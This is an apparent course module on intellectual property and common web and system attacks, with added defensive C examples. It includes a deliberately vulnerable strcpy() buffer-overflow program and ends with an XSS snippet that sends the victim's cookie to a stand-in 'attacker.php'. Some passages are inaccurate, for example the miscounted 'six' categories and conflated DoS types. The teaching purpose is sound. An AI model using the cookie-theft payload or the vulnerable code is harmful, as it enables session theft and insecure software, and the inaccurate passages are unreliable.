Published by Enhelion, 2021-11-09 00:17:08

Module_4


MODULE 3

IP THEFT AND TYPES OF ATTACKS

3.1. WHAT IS IP?

IP stands for Intellectual Property. Intellectual property (IP) refers to creations
of the mind, such as inventions, literary and artistic works, designs, and
symbols, names and images used in commerce to generate profits.

3.2. TYPES OF INTELLECTUAL PROPERTY

• Patents:

A patent is an exclusive right granted for an invention. A patent provides
the patent owner with the right to decide how or if their invention can be
used by others. In exchange for this exclusivity, the patent owner makes
technical information about the invention publicly available in the
published patent document.

• Trade Marks:

A trademark is a sign capable of distinguishing the goods or services of
one enterprise from those of other enterprises. Trademarks originated in
ancient times when artisans used to put their signature or "mark" on their
products.

• Designs:

An industrial design constitutes the ornamental or aesthetic aspect of an
article. A design may consist of two-dimensional features, such as
patterns, lines or colour, or three-dimensional features, such as the shape
or surface of an article.

• Copyrights:

Copyright is a legal term used to describe the rights that creators have
over their literary and artistic works. Everything from books, music, paintings,
sculpture and films to computer programs, databases, advertisements, maps and
technical drawings is covered by copyright.

• Trade Secrets:

A trade secret is a type of intellectual property in the form of a formula,
practice, process, design, instrument, pattern, commercial method, or
compilation of information not generally known or reasonably
discoverable by others, by which a business can obtain an economic
advantage over competitors or customers.

3.3. WHAT CAN BE STOLEN AS IP?

• Ideas / Inventions / Creative Expression
• Products
• Designs
• Product Specification
• Process Information and Methodologies
• Manufacturing Process
• Business Method

3.4. TYPES OF ATTACK

Here we discuss two types of attacks:

1. Web Based Attack.
2. System Based Attack.

3.5. WHAT ARE WEB BASED ATTACKS?

Web based attacks are considered to be the greatest and often the least
understood of all risks related to confidentiality, availability, and integrity. The
aim of a web-based attack differs significantly from that of other attacks. In most
traditional penetration testing exercises, a network or host is the target. Web based
attacks are centred on the application itself and operate at layer 7 of the OSI
model. John Pescatore of the Gartner Group claims that nearly 70% of all attacks
occur at the application layer.

Application vulnerabilities can provide the means by which malicious end
users breach a system's protection mechanisms, usually to take advantage of or
gain access to private information or system resources. Information gathered
could include social security numbers, dates of birth, and maiden names, all of
which are often used in identity theft. Another popular target for attackers is credit
card data. Left unprotected and unencrypted, it can be used to cause
significant damage to an organization's most valued asset: its customers. So
what makes up an application attack? By definition, all web application attacks
consist of at least one normal or modified request aimed at taking advantage of
poor parameter checking or instruction spoofing.

There are six fundamental categories of application attacks.

• Spoofing:
Spoofing is the act of imitating another user or process to perform a task
or retrieve information that would normally not be allowed. An attacker
could use a crafted HTTP request containing the session ID information
of another user and retrieve the targeted user's account information.

• Repudiation:
Applications must have reasonable repudiation controls, such as web
access, authentication, and database transaction logs, in order to tie
specific actions to a single user. Without corroborating logs, online web
application users could easily claim that they did not transfer equities
from one account to an external account of another. Without proof to the
contrary, all online brokerages would be required to reimburse the
client for lost funds. Collecting and correlating logs from multiple
sources (web application, middleware, and database) can prevent
repudiation attacks.

• Information Disclosure:
Information disclosure is one of the biggest threats to large organizations
that maintain private information about their customer base. When
attackers can reveal private information about a user or users of a web
site, consumer confidence in that organization can take drastic hits,
causing losses in sales, stock price, and overall marketability. To prevent
this, applications must have adequate controls that prevent user ID and
session manipulation.

• Denial of Service:
Denial of service attacks are among the most widely known of all
application attacks. They are often generated by malicious users,
competitors or script kiddies. Motivations for this type of attack range
from personal to political, in the hope of stifling an organization’s
ability to field online business.

• Elevation of Privileges:
Authorization controls that are both reliable and staunch are
requirements for any system or application that guards sensitive
information. This attack requires a malicious user to either already possess,
or gain through unlawful methods, the authorization privileges of a regular
user. Once the malicious user is logged into the victim system, an attempt
will be made to exploit an application through poor parameter checking or
instruction spoofing.

3.6. TYPES OF WEB BASED ATTACKS

3.6.1. Injection Attack

Injection attacks refer to a broad class of attack vectors that allow an
attacker to supply untrusted input to a program, which is then processed by an
interpreter as part of a command or query, altering the course of
execution of that program. They are amongst the oldest and most dangerous
web application attacks. They can result in data theft, loss of data integrity,
data loss, denial of service, as well as full system compromise.

Injection is a major problem in web security. Injection attacks, particularly
SQL injection (SQLi), are very dangerous.

3.6.1.1. Types of Injection Attacks

1. SQL injection (SQLi)
2. Cross-site Scripting (XSS)
3. Code injection
4. CRLF injection
5. Email (Mail command/SMTP) injection
6. Host Header injection
7. LDAP injection
8. OS Command injection
9. XPath injection
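Of the nine kinds listed, OS command injection is the easiest to illustrate in a few lines. The C example below is added here and is not part of the module: it shows the unsafe pattern (untrusted input spliced into a shell command string) beside the defensive pattern (an allow-list check, then an argv array that no shell ever parses). The function names, the ping command and the sample inputs are assumptions of the example.

```c
// Added example: input validation and argv construction against OS command
// injection. Function names and the ping command are the example's assumptions.
#include <stdio.h>
#include <string.h>
#include <ctype.h>

// Allow-list check: a hostname may contain only letters, digits, '.' and '-'.
// Anything else (spaces, ';', '|', '&', quotes, '$', backticks) is rejected.
int is_safe_hostname(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 253)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

// Vulnerable pattern: untrusted input spliced into a string meant for system().
// This only builds the string (it never executes it) so the problem is visible:
// a shell would treat ';' in the input as a command separator.
int build_shell_command(char *out, size_t outsz, const char *host)
{
    int n = snprintf(out, outsz, "ping -c 1 %s", host);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

// Defensive pattern: validate first, then place the input in its own argv slot.
// Passed to an execvp()-style API, no shell ever parses the string, so shell
// metacharacters carry no meaning. Returns the argument count or -1 on rejection.
int build_ping_argv(const char *host, const char *argv[], size_t argv_slots)
{
    if (argv_slots < 5 || !is_safe_hostname(host))
        return -1;
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = host;
    argv[4] = NULL;
    return 4;
}

int main(void)
{
    // Constructed inputs: one benign, one carrying a shell metacharacter.
    const char *inputs[] = { "example.com", "example.com; id" };
    for (size_t i = 0; i < 2; i++) {
        char cmd[128];
        const char *argv[5];
        build_shell_command(cmd, sizeof cmd, inputs[i]);
        printf("shell string : %s\n", cmd);
        printf("argv build   : %s\n",
               build_ping_argv(inputs[i], argv, 5) < 0 ? "rejected" : "accepted");
    }
    return 0;
}
```

The same two-step shape (allow-list validation, then an API that keeps data and command separate) is what parameterised queries provide for SQL injection and what proper escaping provides for the LDAP and XPath cases in the list.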

3.6.2. File Inclusion

A file inclusion vulnerability allows an attacker to access unauthorized or
sensitive files available on the web server or to execute malicious files on the
web server by making use of the ‘include’ functionality. This vulnerability is
mainly due to a bad input validation mechanism, wherein the user’s input is
passed to the file include commands without proper validation.

There are 2 types of file inclusion.

1. Remote File Inclusion.
2. Local File Inclusion.

3.6.2.1. Remote File Inclusion

Remote file inclusion allows an attacker to include and execute a remotely
hosted file by referencing it from a script on the attacked page. The attacker can
use RFI to run malicious code either on the server or on the client side. The
impact of this attack can vary from theft of session tokens or data when the
target is a client, to complete system compromise when the target is the
application server.

3.6.2.2. Local File Inclusion

The local file inclusion vulnerability is a process of including local files
available on the server. It occurs when user input contains the path to the file
that is to be included. When such input is not properly sanitized, an attacker
may supply other file names and access unauthorized files. An attacker may also
make use of directory traversal characters to retrieve sensitive files from other
directories.
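The "directory traversal characters" just mentioned can be refused before any include or file-open call runs. The following C example is added here and is not from the module: a segment-by-segment path normaliser that confines a requested path under a web root and rejects anything that climbs above it. The root, function names and request strings are constructed for the example; real code must also percent-decode the request before this check and should verify the final path with realpath() against symlinks.

```c
// Added example: confine a requested file path under a web root.
// Root, function names and request strings are the example's assumptions.
#include <stdio.h>
#include <string.h>

#define MAX_SEGMENTS 64

// Normalise `request` segment by segment and join it onto `root`.
// Returns 0 and writes the resolved path to `out`, or -1 if the request is
// absolute, uses backslashes, is empty, or would climb above the root.
int resolve_under_root(const char *root, const char *request,
                       char *out, size_t outsz)
{
    char buf[1024];
    const char *segs[MAX_SEGMENTS];
    size_t nseg = 0;

    if (request == NULL || request[0] == '/' || strchr(request, '\\') != NULL)
        return -1;                                 // absolute or Windows-style path
    if (strlen(request) >= sizeof buf)
        return -1;                                 // too long to consider
    strcpy(buf, request);                          // bounded by the length check above

    // Assumes the request has already been percent-decoded; a "%2e%2e" that is
    // decoded later would slip past this check.
    for (char *tok = strtok(buf, "/"); tok != NULL; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;                              // current directory: no-op
        if (strcmp(tok, "..") == 0) {
            if (nseg == 0)
                return -1;                         // tried to climb above the root
            nseg--;
            continue;
        }
        if (nseg == MAX_SEGMENTS)
            return -1;
        segs[nseg++] = tok;
    }
    if (nseg == 0)
        return -1;                                 // nothing left to open

    int n = snprintf(out, outsz, "%s", root);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    size_t pos = (size_t)n;
    for (size_t i = 0; i < nseg; i++) {
        n = snprintf(out + pos, outsz - pos, "/%s", segs[i]);
        if (n < 0 || (size_t)n >= outsz - pos)
            return -1;
        pos += (size_t)n;
    }
    return 0;
}

int main(void)
{
    // Constructed requests: two legitimate, three that must be refused.
    const char *requests[] = { "about.html", "docs/../index.html",
                               "../../app/config.ini", "/etc/hosts", "a/b/../../../x" };
    for (size_t i = 0; i < 5; i++) {
        char out[256];
        if (resolve_under_root("/var/www/pages", requests[i], out, sizeof out) == 0)
            printf("%-22s -> %s\n", requests[i], out);
        else
            printf("%-22s -> rejected\n", requests[i]);
    }
    return 0;
}
```

Note that "docs/../index.html" is accepted: traversal inside the root is harmless, and only a net climb above the root is refused. That is why the check counts segments rather than simply searching for "..".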

3.6.3. Cross-Site Scripting

Cross site scripting (XSS) is a common attack vector that injects malicious
code into a vulnerable web application. XSS differs from other web attack
vectors, such as SQL injection, in that it does not directly target the application
itself: the users of the web application are the ones at risk from this type of attack.

Cross site scripting attacks can be of two types: stored and reflected.

• Stored XSS occurs when a malicious script is injected directly into
a vulnerable web application. It is also known as persistent XSS and
is the more damaging of the two.

• Reflected XSS involves reflecting a malicious script off a web
application onto a user’s browser. The script is embedded in a link,
and is only activated once that link is clicked.
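Both stored and reflected XSS depend on the application writing untrusted text into a page without encoding it. As an added example (not code from the module), the C functions below show the unsafe rendering of a comment beside the encoded one; the comment text and function names are constructed for the example.

```c
// Added example: HTML output encoding against stored and reflected XSS.
// The comment strings and function names are constructed for the example.
#include <stdio.h>
#include <string.h>

// Replace the five characters that can change meaning in HTML text or
// attribute values. Returns bytes written (excluding the NUL) or -1 if `out`
// is too small.
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t pos = 0;
    for (const char *p = in; *p != '\0'; p++) {
        char one[2] = { *p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (pos + rl >= outsz)
            return -1;                     // leave room for the terminator
        memcpy(out + pos, rep, rl);
        pos += rl;
    }
    out[pos] = '\0';
    return (int)pos;
}

// Unsafe rendering: the stored or reflected value goes into the page as-is,
// so a value containing a <script> tag becomes live markup in the browser.
int render_comment_unsafe(const char *comment, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "<p>%s</p>", comment);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

// Safe rendering: the value is encoded first, so the browser displays the
// characters instead of interpreting them.
int render_comment_safe(const char *comment, char *out, size_t outsz)
{
    char escaped[512];
    if (html_escape(comment, escaped, sizeof escaped) < 0)
        return -1;
    return render_comment_unsafe(escaped, out, outsz);   // now contains no raw markup
}

int main(void)
{
    // Constructed comment body of the kind a stored XSS would plant.
    const char *comment = "Nice post <b>!</b> <script>alert(1)</script>";
    char page[512];
    render_comment_unsafe(comment, page, sizeof page);
    printf("unsafe: %s\n", page);
    render_comment_safe(comment, page, sizeof page);
    printf("safe  : %s\n", page);
    return 0;
}
```

The encoding shown is correct for HTML text and quoted attribute values; a value placed inside a script block, a URL, or a CSS property needs the encoding rules of that context instead.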

3.6.4. DNS Spoofing Attack

DNS spoofing occurs when a particular DNS server’s records are “spoofed”, or
maliciously altered, to redirect traffic to the attacker. This diversion of traffic
allows the attacker to steal data, spread malware, and so on. For example, if a DNS
record is spoofed, the attacker can divert all the traffic that relied on the correct
DNS record to a fake website that the attacker has created to resemble the real
site, or to a completely different site.

3.6.4.1. How does DNS Spoofing work?

DNS spoofing can be carried out using various methods such as:

• DNS cache poisoning
• Compromising a DNS server
• Implementing a Man in the Middle Attack

However, an attacker’s end goal is usually the same no matter which method
they use. Either they want to steal information, re-route you to a website that
benefits them, or spread malware. The most analyzed method to perform DNS
spoofing is using cache poisoning.

3.6.4.2. DNS Cache Poisoning

Since DNS servers cache DNS translations for faster, more efficient
browsing, attackers can take advantage of this to perform DNS spoofing. If an
attacker is able to inject a forged DNS entry into the DNS server, all users will
use that forged DNS entry until the cache expires. Once the cache expires, the
DNS entry will return to normal, as the DNS server goes through the complete
DNS lookup process again. However, if the DNS server’s software still hasn’t
been updated, the attacker can repeat the injection and continue siphoning
visitors to their website.

DNS cache poisoning can sometimes be quite difficult to notice. If the
malicious website is very similar to the website it is trying to impersonate,
some users may not even notice the difference. Additionally, if the attacker is
using DNS cache poisoning to compromise one company’s DNS records in
order to have access to their emails for example, then this may also be difficult
to detect.
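A resolver's defence against the forged entries described above is to accept a reply only when it matches the query it actually sent. The following C example is added here and is not from the module: it checks the transaction ID, the destination port, the question name, and that every answer record lies within the queried name (a simplified bailiwick rule; production resolvers use the zone of the server they asked). All names, IDs, ports and addresses are constructed for the example.

```c
// Added example: validating a DNS reply against the query that is outstanding.
// Names, IDs, ports and addresses are constructed; the bailiwick rule is simplified.
#include <stdio.h>
#include <string.h>
#include <strings.h>          // strcasecmp (POSIX)

#define MAX_RR 8

struct pending_query {
    unsigned short txid;      // transaction ID the resolver chose at random
    unsigned short src_port;  // randomised source port the query left from
    const char *qname;        // question name, e.g. "www.example.com"
};

struct rr { const char *owner; const char *rdata; };

struct dns_reply {
    unsigned short txid;
    unsigned short dst_port;  // port the reply arrived on
    const char *qname;
    struct rr answers[MAX_RR];
    size_t n_answers;
};

// True if `name` equals `zone` or is a subdomain of it (case-insensitive).
int in_bailiwick(const char *name, const char *zone)
{
    size_t nl = strlen(name), zl = strlen(zone);
    if (nl < zl || strcasecmp(name + (nl - zl), zone) != 0)
        return 0;
    return nl == zl || name[nl - zl - 1] == '.';
}

// Returns 0 when the reply may be cached; otherwise a negative code naming the
// failed check. A forged reply must pass all four to poison the cache.
int validate_reply(const struct pending_query *q, const struct dns_reply *r)
{
    if (r->txid != q->txid)
        return -1;                              // ID mismatch: not our query
    if (r->dst_port != q->src_port)
        return -2;                              // port mismatch: not our socket
    if (strcasecmp(r->qname, q->qname) != 0)
        return -3;                              // answers a different question
    for (size_t i = 0; i < r->n_answers; i++)
        if (!in_bailiwick(r->answers[i].owner, q->qname))
            return -4;                          // record for another name: would poison it
    return 0;
}

int main(void)
{
    struct pending_query q = { 0x1a2b, 53111, "www.example.com" };
    struct dns_reply genuine = { 0x1a2b, 53111, "www.example.com",
                                 { { "www.example.com", "198.51.100.10" } }, 1 };
    // Constructed forgery: matches ID and port but carries an extra record
    // for an unrelated name alongside the real answer.
    struct dns_reply forged = genuine;
    forged.answers[1].owner = "login.example.net";
    forged.answers[1].rdata = "203.0.113.66";
    forged.n_answers = 2;
    printf("genuine reply: %d\n", validate_reply(&q, &genuine));
    printf("forged reply : %d\n", validate_reply(&q, &forged));
    return 0;
}
```

The ID and port checks are what make off-path forgery a guessing game (about 32 bits of entropy combined), and the bailiwick check is what stops a reply for one name from rewriting the cache entry of another; DNSSEC validation, not shown, removes the guessing game entirely.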

3.6.5. Denial of Service (DoS) & Distributed Denial of Service (DDoS)

A Denial-of-Service (DoS) attack is an attack meant to shut down a machine
or network, making it inaccessible to its intended users. DoS attacks
accomplish this by flooding the target with traffic, or sending it information
that triggers a crash.

DoS attacks often target the web servers of high-profile organizations
such as banking, commerce, and media companies, or government and trade
organizations. While DoS attacks do not normally result in the theft or loss of
significant information or other assets, they can cost the victim a great deal of
time and money to handle.

There are two general methods of DoS attacks:

• flooding services
• crashing services

Flood attacks occur when the system receives more traffic than the server
can buffer, causing it to slow down and eventually stop.

Popular flood attacks include:

• Buffer overflow attacks – the most common DoS attack. It is
based on the concept of sending more traffic to a network address than
the programmers have built the system to handle. It includes the
attacks listed below, in addition to others that are designed to
exploit bugs specific to certain applications or networks.

• ICMP flood – This attack takes advantage of misconfigured
network devices by sending spoofed packets that ping every
computer on the targeted network, instead of just one specific
machine. The network is then triggered to amplify the traffic. It is
also known as the ping of death or smurf attack.

• SYN flood – sends a request to connect to a server, but never
completes it. It continues until all open ports are saturated with
requests and none are available for legitimate users to connect to.
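A SYN flood leaves a visible trace on the target: many half-open (SYN_RECV) connections from the same source that never complete. The following C example is added here and is not part of the module: it counts half-open connections per source address over a constructed, netstat-like connection table and flags sources above a threshold. The line format, addresses and threshold are assumptions of the example.

```c
// Added example: flag SYN-flood sources from a connection table snapshot.
// The netstat-like line format, addresses and threshold are constructed.
#include <stdio.h>
#include <string.h>

#define MAX_SOURCES 32

// Constructed snapshot: state, source, destination (one line per connection).
static const char *sample_conntab[] = {
    "SYN_RECV    203.0.113.5:40001 -> 198.51.100.10:443",
    "SYN_RECV    203.0.113.5:40002 -> 198.51.100.10:443",
    "ESTABLISHED 192.0.2.9:51000 -> 198.51.100.10:443",
    "SYN_RECV    203.0.113.5:40003 -> 198.51.100.10:443",
    "SYN_RECV    198.51.100.77:3322 -> 198.51.100.10:443",
    "SYN_RECV    203.0.113.5:40004 -> 198.51.100.10:443",
    "ESTABLISHED 203.0.113.5:40005 -> 198.51.100.10:443",
};
#define SAMPLE_COUNT (sizeof sample_conntab / sizeof sample_conntab[0])

struct src_count { char ip[16]; int half_open; };

// Tally SYN_RECV (half-open) connections per source address.
// Returns the number of distinct sources seen, or -1 if `tbl` fills up.
int count_half_open(const char *lines[], size_t nlines,
                    struct src_count *tbl, size_t tbl_max)
{
    size_t n = 0;
    for (size_t i = 0; i < nlines; i++) {
        char state[16], src[16], dst[16];
        // %*d discards the port numbers; field widths keep every buffer in bounds.
        if (sscanf(lines[i], "%15s %15[^:]:%*d -> %15[^:]:%*d", state, src, dst) != 3)
            continue;                               // unparseable line: skip
        if (strcmp(state, "SYN_RECV") != 0)
            continue;                               // only half-open connections count
        size_t j;
        for (j = 0; j < n; j++)
            if (strcmp(tbl[j].ip, src) == 0)
                break;
        if (j == n) {
            if (n == tbl_max)
                return -1;
            strcpy(tbl[n].ip, src);                 // src is at most 15 chars + NUL
            tbl[n].half_open = 0;
            n++;
        }
        tbl[j].half_open++;
    }
    return (int)n;
}

// Write every source with at least `threshold` half-open connections into
// `flagged`. Returns the number flagged, or -1 on table overflow.
int flag_syn_flooders(const char *lines[], size_t nlines, int threshold,
                      char flagged[][16], size_t max_flagged)
{
    struct src_count tbl[MAX_SOURCES];
    int n = count_half_open(lines, nlines, tbl, MAX_SOURCES);
    if (n < 0)
        return -1;
    size_t f = 0;
    for (int i = 0; i < n; i++) {
        if (tbl[i].half_open >= threshold) {
            if (f == max_flagged)
                return -1;
            strcpy(flagged[f++], tbl[i].ip);
        }
    }
    return (int)f;
}

int main(void)
{
    char flagged[MAX_SOURCES][16];
    int n = flag_syn_flooders(sample_conntab, SAMPLE_COUNT, 3, flagged, MAX_SOURCES);
    for (int i = 0; i < n; i++)
        printf("possible SYN flood source: %s\n", flagged[i]);
    return 0;
}
```

Against a real flood the source addresses are usually spoofed, so per-source counting identifies the pattern rather than the attacker; the operational mitigation is SYN cookies or a connection-rate limit, and this kind of count is what tells you to turn them on.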

3.6.5.1. What is a DDoS Attack?

A distributed denial-of-service (DDoS) attack is an attack in which several
compromised computer systems attack a target, such as a server, website or
other network resource, and cause a denial of service for users of the targeted
resource. The bombardment of incoming messages, connection requests or
malformed packets to the target system forces it to slow down or even crash
and shut down, thereby denying service to legitimate users or systems.

In a typical DDoS attack, the assailant begins by exploiting a vulnerability in
one computer system and making it the DDoS master. The attack master
system identifies other vulnerable systems and, by either infecting the systems
with malware or through bypassing the authentication controls, gains control
over them.

A networked device or a computer under the control of an intruder is known
as a zombie, or bot. The attacker creates what is called a command-and-control
server to command the network of bots, also called a botnet. The person in
control of a botnet is sometimes referred to as the botmaster. Historically,
this term has been used to refer to the first system "acquired" into a botnet,
because it is used to control the spread and activity of other systems in the
botnet.

Botnets can be comprised of almost any number of bots; botnets with tens or
hundreds of thousands of nodes have become increasingly common, and there
may not be an upper limit to their size. Once the botnet is assembled, the
attacker can use the traffic generated by the compromised devices to flood the
target domain and knock it offline.

3.6.6. Dictionary Attack

The dictionary attack uses a simple file containing words that can be found in
a dictionary, hence its rather straightforward name. In other words, this attack
uses exactly the kind of words that many people use as their password.

3.6.7. Brute Force Attack

The brute force attack is similar to the dictionary attack but comes with an
added bonus for the hacker. Instead of just using words, a brute force attack
lets them detect non-dictionary words by working through all possible alpha-
numeric combinations from aaa1 to zzz10.

It’s not quick, provided your password is more than a handful of characters long,
but it will eventually uncover your password. Brute force attacks can be shortened
by throwing additional computing horsepower at them, in terms of processing
power, including harnessing the power of your video card’s GPU.
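Dictionary and brute force attacks (sections 3.6.6 and 3.6.7) both depend on making many guesses against one account, so the standard server-side defence is to make each guess cost the guesser time. The C example below is added here and is not from the module: a per-account tracker that locks the account after a number of failures and doubles the lock duration on each further failure. The threshold, base duration and account names are constructed for the example.

```c
// Added example: per-account lockout with escalating duration against
// dictionary and brute force guessing. Threshold, base duration and
// account names are constructed for the example.
#include <stdio.h>
#include <string.h>
#include <time.h>

#define MAX_ACCOUNTS 16
#define FAILURE_THRESHOLD 5         // failures allowed before the first lock
#define LOCK_BASE_SECONDS 60        // first lock; doubles on each further failure
#define LOCK_MAX_DOUBLINGS 10       // cap: 60 * 2^10 seconds, about 17 hours

struct lockout_entry {
    char user[64];
    int failures;
    time_t locked_until;
};

struct lockout_table {
    struct lockout_entry e[MAX_ACCOUNTS];
    size_t n;
};

static struct lockout_entry *lookup(struct lockout_table *t, const char *user, int create)
{
    for (size_t i = 0; i < t->n; i++)
        if (strcmp(t->e[i].user, user) == 0)
            return &t->e[i];
    if (!create || t->n == MAX_ACCOUNTS)
        return NULL;
    struct lockout_entry *en = &t->e[t->n++];
    snprintf(en->user, sizeof en->user, "%s", user);
    en->failures = 0;
    en->locked_until = 0;
    return en;
}

// Seconds left on the account's lock at time `now`; 0 if not locked or unknown.
// Check this before even comparing the password, so a guess during a lock
// costs the guesser a wait rather than an answer.
long lock_remaining(struct lockout_table *t, const char *user, time_t now)
{
    struct lockout_entry *en = lookup(t, user, 0);
    if (en == NULL || en->locked_until <= now)
        return 0;
    return (long)(en->locked_until - now);
}

// Record a failed login. Returns the lock duration imposed in seconds
// (0 while still under the threshold), or -1 if the table is full.
long record_failure(struct lockout_table *t, const char *user, time_t now)
{
    struct lockout_entry *en = lookup(t, user, 1);
    if (en == NULL)
        return -1;
    en->failures++;
    if (en->failures < FAILURE_THRESHOLD)
        return 0;
    int doublings = en->failures - FAILURE_THRESHOLD;
    if (doublings > LOCK_MAX_DOUBLINGS)
        doublings = LOCK_MAX_DOUBLINGS;
    long duration = (long)LOCK_BASE_SECONDS << doublings;
    en->locked_until = now + duration;
    return duration;
}

// A successful login clears the history for that account.
void record_success(struct lockout_table *t, const char *user)
{
    struct lockout_entry *en = lookup(t, user, 0);
    if (en != NULL) {
        en->failures = 0;
        en->locked_until = 0;
    }
}

int main(void)
{
    struct lockout_table t = { 0 };
    time_t now = time(NULL);
    // Constructed burst of wrong guesses against one account.
    for (int i = 1; i <= 7; i++) {
        long lock = record_failure(&t, "alice", now);
        printf("failure %d: lock for %ld s\n", i, lock);
    }
    printf("alice locked for another %ld s\n", lock_remaining(&t, "alice", now));
    return 0;
}
```

Escalating lockout caps the guess rate at a handful per hour regardless of the attacker's hardware, which is the quantity the GPU remark above is about; pair it with per-source rate limiting so that a guesser cannot lock legitimate users out on purpose.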

3.6.8. Buffer Overflow Attack

A buffer is a temporary area for data storage. When a program or system process
places more data in a buffer than it can hold, the extra data overflows. This
causes some of that data to leak into adjacent buffers, which can corrupt or
overwrite whatever data they were holding.

In a buffer-overflow attack, the extra data sometimes holds specific
instructions for actions planned by a hacker or malicious user. For instance, the
data could trigger a response that damages files, changes data or reveals private
information.

Attackers use a buffer-overflow exploit to take advantage of a program that is
waiting on a user’s input.

There are two types of buffer overflows:

• stack-based
• heap-based

Heap-based overflows, which are difficult to execute and the less common of the
two, attack an application by flooding the memory space reserved for a program.
Stack-based buffer overflows, which are more common among attackers,
exploit applications and programs by using what is known as a stack: memory
space used to store user input.

Let us study a real program example, written in C, that shows the danger of such
situations.

// A C program to demonstrate buffer overflow
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    // Reserve 5 bytes of buffer plus the terminating NULL.
    // Should allocate 8 bytes = 2 double words.
    // To overflow, need more than 8 bytes...
    // If more than 8 characters are input by the user,
    // there will be an access violation (segmentation fault).
    char buffer[5];

    // a prompt on how to execute the program...
    if (argc < 2)
    {
        printf("strcpy() NOT executed....\n");
        printf("Syntax: %s <characters>\n", argv[0]);
        exit(0);
    }

    // copy the user input to buffer, without any bounds
    // checking; a secure version is strcpy_s()
    strcpy(buffer, argv[1]);
    printf("buffer content= %s\n", buffer);

    // you may want to try strcpy_s()
    printf("strcpy() executed...\n");

    return 0;
}

Compile this program on Linux and run the resulting executable as:

./output_file INPUT

Input: 12345678 (8 bytes). The program runs smoothly.

Input: 123456789 (9 bytes). A "Segmentation fault" message is displayed and the
program terminates.

The vulnerability exists because the buffer can be overflowed if the user
input (argv[1]) is bigger than 8 bytes. Why 8 bytes? On a 32 bit (4 byte) system,
we must fill up a double word (32 bits) of memory. The character (char) size is
1 byte, so if we request a buffer of 5 bytes, the system will allocate 2 double
words (8 bytes). That is why, when you input more than 8 bytes, the buffer will
be overflowed.

Similar standard functions that are technically less vulnerable, such as
strncpy(), strncat(), and memcpy(), do exist. However, the problem with these
functions is that the programmer, not the compiler, is responsible for asserting
the size of the buffer.

Every programmer must be familiar with the buffer overflow problem before
they start coding. Many of the bugs generated can, in most cases, be exploited
as a result of buffer overflow.
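The point just made, that the programmer rather than the compiler must assert the buffer size, is shown in the following C example, which is added here and is not the module's program: a copy routine that refuses input that does not fit (rather than truncating it silently), applied to the same 5-byte buffer as the program above, alongside the strncpy() pitfall of a missing terminator. The function names are the example's own.

```c
// Added example: a bounded copy that refuses oversized input, applied to the
// same 5-byte buffer as the module's program. Function names are the example's own.
#include <stdio.h>
#include <string.h>

// Copy `src` into `dst` only if it fits with its terminator; otherwise return -1
// without writing anything. Never reads more than `dstsz` bytes of `src`.
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz)
        return -1;                    // dstsz or more characters: no room for the NUL
    memcpy(dst, src, n + 1);          // includes the terminator
    return (int)n;
}

// The strncpy() pitfall the module alludes to: when `src` has dstsz-1 or more
// characters strncpy() writes no terminator, so the caller must add one.
// This variant truncates silently, which is sometimes acceptable, sometimes not.
void copy_truncating(char *dst, size_t dstsz, const char *src)
{
    strncpy(dst, src, dstsz - 1);
    dst[dstsz - 1] = '\0';
}

// Same input path as the module's program, with the size check the module
// says the programmer must supply. Writes the message the program would have
// printed into `out`; returns 0 on success, -1 when the input is rejected.
int echo_argument(const char *arg, char *out, size_t outsz)
{
    char buffer[5];                   // the module's buffer: 4 characters plus NUL
    if (copy_bounded(buffer, sizeof buffer, arg) < 0) {
        snprintf(out, outsz, "input too long (max %zu characters)", sizeof buffer - 1);
        return -1;
    }
    snprintf(out, outsz, "buffer content= %s", buffer);
    return 0;
}

int main(int argc, char *argv[])
{
    char msg[64];
    const char *arg = argc > 1 ? argv[1] : "123456789";   // constructed default input
    echo_argument(arg, msg, sizeof msg);
    printf("%s\n", msg);
    return 0;
}
```

With this check in place the 9-byte input that crashed the module's program is simply rejected, and so is the 8-byte input that happened to run "smoothly" there: a buffer[5] only ever has room for four characters, and the fact that eight did not crash was an accident of stack layout, not a property of the code.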

3.6.9. Session Hijacking

A computer session, in everyday terms, is a temporary interaction you
have with a website. For example, a session is the time between when you first
log into your bank account and when you log off after completing your operation.

3.6.9.1. What is Session Hijacking?

TCP session hijacking is a security attack on a user session over a protected
network. The most common method of session hijacking is called IP spoofing.
It occurs when an attacker uses source-routed IP packets to insert commands
into an active communication between two nodes on a network while
disguising itself as one of the authenticated users. This type of attack is possible
because authentication typically is only done at the beginning of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack.
Using a sniffer, the attacker can observe the communication between devices
and collect the data that is transmitted.

The session token could be compromised in multiple ways. The most common
are:

• Predictable session token;
• Session sniffing;
• Client-side attacks (XSS, malicious JavaScript code, Trojans, etc.);
• Man-in-the-middle attack;
• Man-in-the-browser attack;
• Using packet sniffers.

Using Packet Sniffers

In the above figure, it can be seen that the attacker captures the victim’s session
ID by using a packet sniffer, and then uses it to gain access to the server.

Cross Site Scripting (XSS Attack)

Attackers can also capture a victim’s session ID using an XSS attack that relies
on JavaScript. An attacker sends a crafted link to the victim containing the
malicious JavaScript. When the victim clicks on the link, the JavaScript runs
and carries out the instructions devised by the attacker.

<SCRIPT type="text/javascript">
    var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>
